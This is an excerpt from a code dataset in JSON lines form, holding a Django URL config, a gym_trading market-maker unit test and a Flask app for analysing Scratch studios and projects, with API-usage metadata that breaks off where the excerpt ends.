+{"seq_id": "391227693", "text": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^add$', views.TaskInstanceAddView.as_view()),\n url(r'^(?P[^/]+)?$', views.TaskInstanceListView.as_view()),\n url(r'^deploy/(?P[^/]+)$', views.TaskInstanceDeployView.as_view()),\n url(r'^undeploy/(?P[^/]+)$', views.TaskInstanceUndeployView.as_view()),\n url(r'^get_addresses/(?P[^/]+)$', views.GetTaskInstanceAddressesView.as_view()),\n]\n", "sub_path": "src/deploy/deployer/task_instances/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 442, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "193883325", "text": "import unittest\n\nimport gym\n\nimport gym_trading\nfrom gym_trading.utils.decorator import print_time\n\n\nclass MarketMakerTestCases(unittest.TestCase):\n\n @print_time\n def test_time_event_env(self):\n config = dict(\n id=gym_trading.envs.MarketMaker.id,\n symbol='LTC-USD',\n fitting_file='demo_LTC-USD_20190926.csv.xz',\n testing_file='demo_LTC-USD_20190926.csv.xz',\n max_position=10,\n window_size=5,\n seed=1,\n action_repeats=5,\n training=False,\n format_3d=True,\n reward_type='default',\n ema_alpha=None,\n )\n print(f\"**********\\n{config}\\n**********\")\n\n env = gym.make(**config)\n done = gym_trading.envs.test_env_loop(env=env)\n _ = env.reset()\n self.assertEqual(True, done)\n\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "gym_trading/tests/test_market_maker.py", "file_name": "test_market_maker.py", "file_ext": "py", "file_size_in_byte": 900, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "attribute"}, {"api_name": "gym_trading.envs", "line_number": 14, "usage_type": "attribute"}, {"api_name": "gym.make", "line_number": 29, "usage_type": "call"}, {"api_name": "gym_trading.envs.test_env_loop", "line_number": 30, "usage_type": "call"}, {"api_name": "gym_trading.envs", "line_number": 30, "usage_type": "attribute"}, {"api_name": "gym_trading.utils.decorator.print_time", "line_number": 11, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "145068320", "text": "import json\nimport logging\nimport markdown\nimport os\nimport threading\nimport time\nimport traceback\nimport random\nimport urllib\nfrom flask import Flask, redirect, render_template, request, Response, session, url_for, send_from_directory\nfrom flask_caching import Cache\nfrom ccl_scratch_tools import Parser\nfrom ccl_scratch_tools import Scraper\nfrom ccl_scratch_tools import Visualizer\nfrom werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError, NotFound\n\nfrom lib import common\nfrom lib import errors\nfrom lib import schema\nfrom lib import scrape\nfrom lib import tasks\nfrom lib import authentication\nfrom lib import admin\nfrom lib import display\nfrom lib import certificate\nfrom lib import summary\nfrom lib.authentication import admin_required, login_required\nfrom lib.reports import reporting\nfrom lib.settings import CACHE_DIRECTORY, CLRY, PROJECT_CACHE_LENGTH, PROJECT_DIRECTORY, REDIRECT_PAGES, SITE\n\napp = Flask(__name__)\napp.register_blueprint(reporting)\n\ntry:\n celery = tasks.make_celery(CLRY[\"name\"],\n CLRY[\"result_backend\"],\n CLRY[\"broker_url\"],\n app)\nexcept:\n logging.warn(\"Couldn't load celery.\")\n\nparser = Parser()\n\napp.jinja_env.filters[\"twodec\"] = common.twodec\napp.jinja_env.filters[\"indexOf\"] = common.indexOf\napp.jinja_env.filters[\"pluralize\"] = common.pluralize\napp.jinja_env.filters[\"human_block\"] = common.human_block\napp.jinja_env.filters[\"get_selected\"] = common.get_selected\napp.secret_key = os.urandom(24)\napp.url_map.strict_slashes = False\n\napp.config[\"CACHE_TYPE\"] = \"lib.cache.MongoCache\"\napp.config[\"CACHE_DEFAULT_TIMEOUT\"] = 1200\n\ncache = Cache(app)\n\n\n# Pass things to all templates\n@app.context_processor\ndef inject_vars():\n return dict(user=authentication.get_login_info(),\n valid_admin_pages=admin.VALID_ADMIN_PAGES,\n SITE=SITE)\n\n\n# Helper routes\n@app.route(\"/redirect\", methods=[\"GET\"])\ndef redirect_to():\n if (request.args.get(\"username\") is not None\n and request.args.get(\"username\") != \"\"): # yapf: disable\n return redirect(\"/user/{0}\".format(\n urllib.parse.quote(request.args.get(\"username\"))))\n else:\n return render_template(\"index.html\",\n message=\"Sorry! I wasn't able to do that.\")\n\n\n# Authentication\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n session.clear()\n\n if request.method == \"GET\":\n return render_template(\"login.html\")\n else:\n # yapf: disable\n if (request.form[\"username\"] is None\n or request.form[\"username\"] == \"\"\n or request.form[\"password\"] is None\n or request.form[\"password\"] == \"\"):\n return render_template(\"login.html\",\n message=\"All fields are required!\")\n # yapf: enable\n\n res = authentication.login_user(request.form[\"username\"],\n request.form[\"password\"])\n if res:\n return redirect(\"/admin\")\n else:\n return render_template(\n \"login.html\",\n message=\"Couldn't log in with that username/password combination!\"\n )\n\n\n@app.route(\"/logout\", methods=[\"GET\"])\ndef logout():\n session.clear()\n return render_template(\"login.html\", message=\"Successfully logged out.\")\n\n\n@app.route(\"/register\", methods=[\"POST\"])\ndef register():\n res = authentication.register_user(request.form[\"username\"],\n request.form[\"email\"],\n request.form[\"first_name\"],\n request.form[\"last_name\"],\n request.form[\"password\"],\n request.form[\"user_role\"])\n\n if type(res) == bool and res:\n return redirect(\"/login\")\n else:\n return render_template(\n \"index.html\",\n message=\"One or several of your inputs were invalid.\")\n\n\n# For when the site is brand new\n@app.route(\"/setup\", methods=[\"GET\"])\ndef setup():\n common.connect_db()\n if len(authentication.User.objects()) == 0:\n session[\"user\"] = {\"role\": \"site_admin\"}\n return render_template(\"setup.html\")\n else:\n return redirect(\"/\")\n\n\n# Admin pages\n@app.route(\"/admin\")\n@admin_required\ndef admin_index():\n return render_template(\"admin/index.html\")\n\n\n@app.route(\"/admin/\", methods=[\"GET\", \"POST\"])\n@admin_required\ndef admin_page(page):\n if page in admin.VALID_ADMIN_PAGES:\n if request.method == \"GET\":\n info = admin.get_info(page)\n return render_template(\"admin/{0}.html\".format(page), info=info)\n else:\n if request.is_json:\n form = request.get_json()\n else:\n form = request.form\n result = admin.set_info(page, form)\n\n if \"redirect\" in request.form:\n if request.form[\"redirect\"] in admin.VALID_REDIRECTS:\n return redirect(request.form[\"redirect\"])\n\n return json.dumps(result)\n else:\n return redirect(\"/admin\")\n\n\n@app.route(\"/admin/cache/clear\")\n@admin_required\ndef clear_cache():\n cache.clear()\n return redirect(\"/admin\")\n\n\n@app.route(\"/admin/error/\")\n@admin_required\ndef error_page(eid):\n error = errors.get_error(eid)\n if not error:\n return redirect(\"/admin/errors\")\n else:\n issue = {\n \"title\":\n \"{} error when loading {}\"\n .format(error[\"error_code\"],\n urllib.parse.urlparse(error[\"url\"]).path),\n \"body\":\n \"**[Replicate here]({})**\\n\\nWhen accessing `{}`, there's a {} error. The traceback says:\\n\\n```python\\n{}\\n```\"\n .format(error[\"url\"],\n urllib.parse.urlparse(error[\"url\"]).path,\n error[\"error_code\"],\n error[\"traceback\"])\n }\n\n return render_template(\"admin/error.html\", error=error, issue=issue)\n\n\ndef schema_editor(id):\n data = {\n \"min_instructions_length\": 0,\n \"min_description_length\": 0,\n \"min_comments_made\": 0,\n \"min_blockify\": {\n \"comments\": 0,\n \"costumes\": 0,\n \"sounds\": 0,\n \"sprites\": 0,\n \"variables\": 0\n },\n \"required_text\": [],\n \"required_block_categories\": {},\n \"required_blocks\": [],\n \"stats\": [],\n \"text\": {},\n \"comparison_basis\": {\n \"basis\": \"__none__\",\n \"priority\": None\n }\n }\n\n if id != \"__new__\":\n common.connect_db()\n try:\n data = schema.Challenge.objects(id=id).first().to_mongo()\n except AttributeError:\n raise NotFound()\n\n blocks = parser.block_data\n block_list = list()\n block_dict = dict()\n\n for cat in blocks:\n block_list += blocks[cat].keys()\n\n for block in blocks[cat]:\n block_dict[blocks[cat][block].lower().replace(\" \", \"\")] = block\n\n return render_template(\"admin/edit_schema.html\",\n blocks=blocks,\n block_dict=block_dict,\n block_list=block_list,\n categories=list(blocks.keys()),\n data=data,\n schema_id=id,\n stats=scrape.get_default_studio_stats())\n\n\n@app.route(\"/admin/schemas/edit\", methods=[\"GET\"])\n@admin_required\ndef add_schema():\n return schema_editor(\"__new__\")\n\n\n@app.route(\"/admin/schemas/edit/\", methods=[\"GET\"])\n@admin_required\ndef edit_schema(id):\n return schema_editor(id)\n\n\n# Studios, projects, users, challenges\n@app.route(\"/certificate/generate\")\n@admin_required\ndef generate_certificate():\n common.connect_db()\n authors = list(set(scrape.Project.objects().values_list(\"author\")))\n certificate.generate_certs.delay(authors)\n\n return redirect(\"/admin/utilities\")\n\n\n@app.route(\"/participation\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/md\", methods=[\"POST\"])\ndef md():\n text = request.form[\"text\"]\n if text is not None:\n ret = {\"html\": common.md(text), \"js\": \"/static/js/sb.js\"}\n\n return json.dumps(ret)\n return \"False\"\n\n\n@app.route(\"/project/d\", methods=[\"POST\"])\ndef project_download():\n if request.form[\"sid\"] is None or request.form[\"pid\"] is None:\n return \"False\"\n sid = request.form[\"sid\"]\n pid = request.form[\"pid\"]\n\n scraper = Scraper()\n try:\n pid = int(pid)\n except:\n return \"False\"\n\n if pid in scraper.get_projects_in_studio(sid):\n return str(scrape.add_project(pid, sid, CACHE_DIRECTORY))\n else:\n return \"False\"\n\n\n@app.route(\"/project/f/\", methods=[\"POST\"])\ndef project_feedback(pid):\n if (\"_gu_uid\" in request.cookies and \"feelings\" in request.json\n and \"minutes\" in request.json): # yapf: disable\n try:\n common.connect_db()\n reflection = scrape.ProjectReflection(\n project_id=pid,\n gu_uid=request.cookies.get(\"_gu_uid\"),\n minutes=int(request.json[\"minutes\"]),\n feelings=request.json[\"feelings\"])\n reflection.save()\n return \"True\"\n except:\n return \"False\"\n else:\n return \"False\"\n\n\n@app.route(\"/project/o/\")\ndef feedback_owner(pid):\n try:\n common.connect_db()\n reflection = scrape.ProjectReflection.objects(\n project_id=pid).order_by(\"-timestamp\").first()\n return reflection[\"gu_uid\"]\n except:\n return \"\"\n\n\n@app.route(\"/project/r/\")\ndef reload_project(pid):\n try:\n pid = int(pid)\n except:\n pid = 0\n\n scrape.set_reload_page(pid)\n return redirect(\"/project/{}\".format(pid))\n\n\n@app.route(\"/project//view\", methods=[\"GET\"])\n@cache.cached(timeout=PROJECT_CACHE_LENGTH,\n forced_update=scrape.get_reload_project,\n unless=authentication.session_active)\ndef project__id(pid):\n return display.get_project_page(pid, CACHE_DIRECTORY)\n\n\n@app.route(\"/project/\", methods=[\"GET\"])\ndef project_id(pid):\n return render_template(\"project_loader.html\")\n\n\n@app.route(\"/studio\", methods=[\"GET\", \"POST\"])\n@admin_required\ndef studio():\n if request.method == \"GET\":\n common.connect_db()\n return render_template(\"studio.html\",\n schemas=list(schema.Challenge.objects().order_by(\"-modified\"))) # yapf: disable\n else:\n scraper = Scraper()\n sid = scraper.get_id(request.form[\"studio\"])\n\n s = None\n if request.form[\"schema\"] != \"__none__\":\n s = request.form[\"schema\"]\n\n if request.form[\"studio\"] == \"__all__\":\n scrape.rescrape_all.delay(cache_directory=CACHE_DIRECTORY)\n return \"Started\"\n elif sid is not None:\n scrape.add_studio.delay(sid,\n schema=s,\n show=(\"show\" in request.form),\n cache_directory=CACHE_DIRECTORY)\n return redirect(\"/studio/{0}\".format(sid))\n else:\n return render_template(\n \"studio.html\",\n message=\"Please enter a valid studio ID or URL.\")\n\n\n@app.route(\"/studio/list/\")\ndef studio_list(sid):\n if sid == \"\":\n return \"Must include a studio ID.\", 400\n\n common.connect_db()\n studio = scrape.Studio.objects(studio_id=sid).first()\n\n if studio is None:\n return \"Studio does not exist.\", 404\n\n limit = 8\n page = 0\n order = \"author\"\n try:\n if \"page\" in request.args:\n page = int(request.args[\"page\"])\n if \"order\" in request.args:\n if request.args[\"order\"] in {\"author\", \"title\", \"id\", \"project_id\"}:\n order = request.args[\"order\"]\n if \"limit\" in request.args:\n if int(request.args[\"limit\"]) <= 100:\n limit = int(request.args[\"limit\"])\n except:\n return \"Invalid arguments\", 400\n\n skip = page * limit\n\n projects = scrape.Project.objects(\n studio_id=sid).order_by(order).skip(skip).limit(limit)\n info = {\"projects\": list()}\n for i, project in enumerate(projects):\n info[\"projects\"].append({\n \"project_id\": project[\"project_id\"],\n \"title\": project[\"title\"],\n \"author\": project[\"author\"],\n \"image\": (project[\"image\"] if \"image\" in project else \"\"),\n \"modified\": project[\"history\"][\"modified\"]\n })\n\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\n@app.route(\"/studio/\")\ndef studio_id(sid):\n if sid == \"\":\n return redirect(\"/prompts\")\n\n common.connect_db()\n studio = scrape.Studio.objects(studio_id=sid).first()\n\n if studio is None or (not (studio[\"public_show\"]\n or authentication.session_active())):\n return redirect(\"/prompts\")\n\n projects = list(scrape.Project.objects(studio_id=sid).order_by(\"author\"))\n info = {\"authors\": list(), \"project_ids\": list(), \"titles\": list()}\n\n for project in projects:\n info[\"authors\"].append(project[\"author\"].lower())\n info[\"project_ids\"].append(project[\"project_id\"])\n info[\"titles\"].append(project[\"title\"].lower())\n\n message = None\n if studio[\"status\"] == \"in_progress\" or studio[\"status\"] is None:\n message = \"This studio is currently in the process of being downloaded and analyzed. Refresh page.\"\n\n return render_template(\"studio_id.html\",\n info=info,\n projects=projects,\n studio=studio,\n message=message)\n\n\n@app.route(\"/user/\", methods=[\"GET\", \"POST\"])\ndef user_id(username):\n if request.method == \"POST\":\n return send_from_directory(f\"{CACHE_DIRECTORY}/certificates\",\n filename=\"{}.pdf\".format(username.lower()))\n else:\n common.connect_db()\n projects = list(scrape.Project.objects(author=username.lower()))\n studios = dict()\n\n keep_projects = list()\n for i, project in enumerate(projects):\n if project[\"studio_id\"] not in studios:\n studio = scrape.Studio.objects(\n studio_id=project[\"studio_id\"]).first()\n\n if studio is not None:\n studios[project[\"studio_id\"]] = studio\n keep_projects.append(project)\n else:\n keep_projects.append(project)\n\n return render_template(\"username.html\",\n projects=keep_projects,\n studios=studios,\n username=username)\n\n\n@app.route(\"/prompts\", methods=[\"GET\"])\n@cache.cached(timeout=600, unless=authentication.session_active)\ndef prompts():\n common.connect_db()\n studios = list(scrape.Studio.objects(public_show=True))\n schema_ids = set()\n for studio in studios:\n if \"challenge_id\" not in studio:\n studios.remove(studio)\n break\n\n schema_ids.add(studio[\"challenge_id\"])\n\n schemas = schema.Challenge.objects(id__in=schema_ids).order_by(\"short_label\", \"title\") # yapf: disable\n id_order = list(schemas.values_list(\"id\"))\n\n for i in range(len(id_order)):\n id_order[i] = str(id_order[i])\n\n schemas = schemas.as_pymongo()\n\n new_schemas = dict()\n for sc in schemas:\n new_schemas[str(sc[\"_id\"])] = sc\n\n # Order the studios\n ordered_studios = [None] * len(studios)\n for studio in studios:\n studio[\"challenge_id\"] = str(studio[\"challenge_id\"])\n\n try:\n ordered_studios[id_order.index(studio[\"challenge_id\"])] = studio\n except ValueError:\n pass\n\n return render_template(\"prompts.html\",\n challenges=ordered_studios,\n schemas=new_schemas)\n\n\n@app.route(\"/summary\", methods=[\"GET\", \"POST\"])\ndef summarize():\n if request.method == \"GET\":\n with open(\"{}/lib/data/summary.json\".format(PROJECT_DIRECTORY)) as f:\n data = json.load(f)\n\n for i, item in enumerate(data[\"content\"]):\n data[\"content\"][i] = common.md(item) if isinstance(item, str) else item # yapf: disable\n\n return render_template(\"summary.html\", data=data)\n else:\n with open(\"{}/data/summary.json\".format(CACHE_DIRECTORY)) as f:\n return Response(f.read(), mimetype=\"application/json\")\n\n\n@app.route(\"/summary/image\")\n@cache.cached()\ndef summary_image():\n try:\n with open(\"{}/cache/data/projects.jpg\".format(PROJECT_DIRECTORY), \"rb\") as f: # yapf: disable\n return f.read()\n except:\n return \"Not found\", 404\n\n\n@app.route(\"/summary/generate\")\n@admin_required\ndef generate_summary():\n summary.generate_summary_page.delay()\n return redirect(\"/admin/utilities\")\n\n\n# Static pages -- About, Strategies, Signup, Research\n@app.route(\"/\")\n@cache.cached(unless=authentication.session_active)\ndef homepage():\n return render_template(\"home.html\", section=\"home\")\n\n\n@app.route(\"/about\", methods=[\"GET\"])\n@cache.cached(unless=authentication.session_active)\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/strategies\", methods=[\"GET\"])\n@cache.cached(unless=authentication.session_active)\ndef strategies():\n return render_template(\"strategies.html\")\n\n\n@app.route(\"/signup\", methods=[\"GET\", \"POST\"])\n@cache.cached(unless=authentication.session_active)\ndef signup():\n return render_template(\"signup.html\")\n\n\n@app.route(\"/research\", methods=[\"GET\"])\n@cache.cached(unless=authentication.session_active)\ndef research():\n return render_template(\"research.html\")\n\n\n# Error pages\n@app.route(\"/ie\")\n@cache.cached(unless=authentication.session_active)\ndef ie():\n return render_template(\"ie.html\")\n\n\ndef error(e):\n \"\"\"Handle errors.\"\"\"\n\n if e.code == 404 and request.path in REDIRECT_PAGES:\n return redirect(REDIRECT_PAGES[request.path], code=301)\n\n status = \"closed\" if e.code == 404 else \"open\"\n saved = errors.add_error(e.code,\n request.url,\n traceback.format_exc(),\n status)\n\n if not isinstance(e, HTTPException):\n e = InternalServerError()\n\n scratch = \"when i receive [error {} v]\\n say [Oh no!]\\nswitch costume to (sad :\\( v)\".format(e.code) # yapf: disable\n\n return render_template(\"error.html\", error=e, scratch=scratch, saved=saved)\n\n\n# Listen for errors\nfor code in default_exceptions:\n app.errorhandler(code)(error)\n\nif __name__ == \"__main__\":\n app.run()\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 18887, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 31, "usage_type": "call"}, {"api_name": "lib.reports.reporting", "line_number": 32, "usage_type": "argument"}, {"api_name": "lib.tasks.make_celery", "line_number": 35, "usage_type": "call"}, {"api_name": "lib.tasks", "line_number": 35, "usage_type": "name"}, {"api_name": "lib.settings.CLRY", "line_number": 35, "usage_type": "name"}, {"api_name": "lib.settings.CLRY", "line_number": 36, "usage_type": "name"}, {"api_name": "lib.settings.CLRY", "line_number": 37, "usage_type": "name"}, {"api_name": "logging.warn", "line_number": 40, "usage_type": "call"}, {"api_name": "ccl_scratch_tools.Parser", "line_number": 42, "usage_type": "call"}, {"api_name": "lib.common.twodec", "line_number": 44, "usage_type": "attribute"}, {"api_name": "lib.common", "line_number": 44, "usage_type": "name"}, {"api_name": "lib.common.indexOf", "line_number": 45, "usage_type": "attribute"}, {"api_name": "lib.common", "line_number": 45, "usage_type": "name"}, {"api_name": "lib.common.pluralize", "line_number": 46, "usage_type": "attribute"}, {"api_name": "lib.common", "line_number": 46, "usage_type": "name"}, {"api_name": "lib.common.human_block", "line_number": 47, "usage_type": "attribute"}, {"api_name": "lib.common", "line_number": 47, "usage_type": "name"}, {"api_name": "lib.common.get_selected", "line_number": 48, "usage_type": "attribute"}, {"api_name": "lib.common", "line_number": 48, "usage_type": "name"}, {"api_name": "os.urandom", "line_number": 49, "usage_type": "call"}, {"api_name": "flask_caching.Cache", "line_number": 55, "usage_type": "call"}, {"api_name": "lib.authentication.get_login_info", "line_number": 61, "usage_type": "call"}, {"api_name": "lib.authentication", "line_number": 61, "usage_type": "name"}, {"api_name": "lib.admin.VALID_ADMIN_PAGES", "line_number": 62, "usage_type": "attribute"}, {"api_name": "lib.admin", "line_number": 62, "usage_type": "name"}, {"api_name": "lib.settings.SITE", "line_number": 63, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 69, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 70, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 70, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 72, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request.args.get", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.session.clear", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 81, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 87, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 87, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 91, "usage_type": "call"}, {"api_name": "lib.authentication.login_user", "line_number": 95, "usage_type": "call"}, {"api_name": "lib.authentication", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 95, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 96, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 96, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.session.clear", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 108, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 109, "usage_type": "call"}, {"api_name": "lib.authentication.register_user", "line_number": 114, "usage_type": "call"}, {"api_name": "lib.authentication", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 114, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 115, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 115, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 116, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 116, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 117, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 117, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 118, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 124, "usage_type": "call"}, {"api_name": "lib.common.connect_db", "line_number": 132, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 132, "usage_type": "name"}, {"api_name": "lib.authentication.User.objects", "line_number": 133, "usage_type": "call"}, {"api_name": "lib.authentication.User", "line_number": 133, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 133, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 137, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 144, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 142, "usage_type": "name"}, {"api_name": "lib.admin.VALID_ADMIN_PAGES", "line_number": 150, "usage_type": "attribute"}, {"api_name": "lib.admin", "line_number": 150, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 151, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 151, "usage_type": "name"}, {"api_name": "lib.admin.get_info", "line_number": 152, "usage_type": "call"}, {"api_name": "lib.admin", "line_number": 152, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.request.is_json", "line_number": 155, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 155, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 156, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 158, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 158, "usage_type": "name"}, {"api_name": "lib.admin.set_info", "line_number": 159, "usage_type": "call"}, {"api_name": "lib.admin", "line_number": 159, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 161, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 161, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 162, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 162, "usage_type": "name"}, {"api_name": "lib.admin.VALID_REDIRECTS", "line_number": 162, "usage_type": "attribute"}, {"api_name": "lib.admin", "line_number": 162, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 163, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 163, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 163, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 165, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 167, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 148, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 174, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 171, "usage_type": "name"}, {"api_name": "lib.errors.get_error", "line_number": 180, "usage_type": "call"}, {"api_name": "lib.errors", "line_number": 180, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 182, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 188, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 188, "usage_type": "attribute"}, {"api_name": "urllib.parse.urlparse", "line_number": 192, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 192, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 197, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 178, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 224, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 224, "usage_type": "name"}, {"api_name": "lib.schema.Challenge.objects", "line_number": 226, "usage_type": "call"}, {"api_name": "lib.schema.Challenge", "line_number": 226, "usage_type": "attribute"}, {"api_name": "lib.schema", "line_number": 226, "usage_type": "name"}, {"api_name": "werkzeug.exceptions.NotFound", "line_number": 228, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 240, "usage_type": "call"}, {"api_name": "lib.scrape.get_default_studio_stats", "line_number": 247, "usage_type": "call"}, {"api_name": "lib.scrape", "line_number": 247, "usage_type": "name"}, {"api_name": "lib.authentication.admin_required", "line_number": 251, "usage_type": "name"}, {"api_name": "lib.authentication.admin_required", "line_number": 257, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 266, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 266, "usage_type": "name"}, {"api_name": "lib.scrape.Project.objects", "line_number": 267, "usage_type": "call"}, {"api_name": "lib.scrape.Project", "line_number": 267, "usage_type": "attribute"}, {"api_name": "lib.scrape", "line_number": 267, "usage_type": "name"}, {"api_name": "lib.certificate.generate_certs.delay", "line_number": 268, "usage_type": "call"}, {"api_name": "lib.certificate.generate_certs", "line_number": 268, "usage_type": "attribute"}, {"api_name": "lib.certificate", "line_number": 268, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 270, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 264, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 275, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 280, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 280, "usage_type": "name"}, {"api_name": "lib.common.md", "line_number": 282, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 282, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 284, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 290, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 290, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 292, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 292, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 293, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 293, "usage_type": "name"}, {"api_name": "ccl_scratch_tools.Scraper", "line_number": 295, "usage_type": "call"}, {"api_name": "lib.scrape.add_project", "line_number": 302, "usage_type": "call"}, {"api_name": "lib.settings.CACHE_DIRECTORY", "line_number": 302, "usage_type": "argument"}, {"api_name": "lib.scrape", "line_number": 302, "usage_type": "name"}, {"api_name": "flask.request.cookies", "line_number": 309, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 309, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 309, "usage_type": "attribute"}, {"api_name": "flask.request.json", 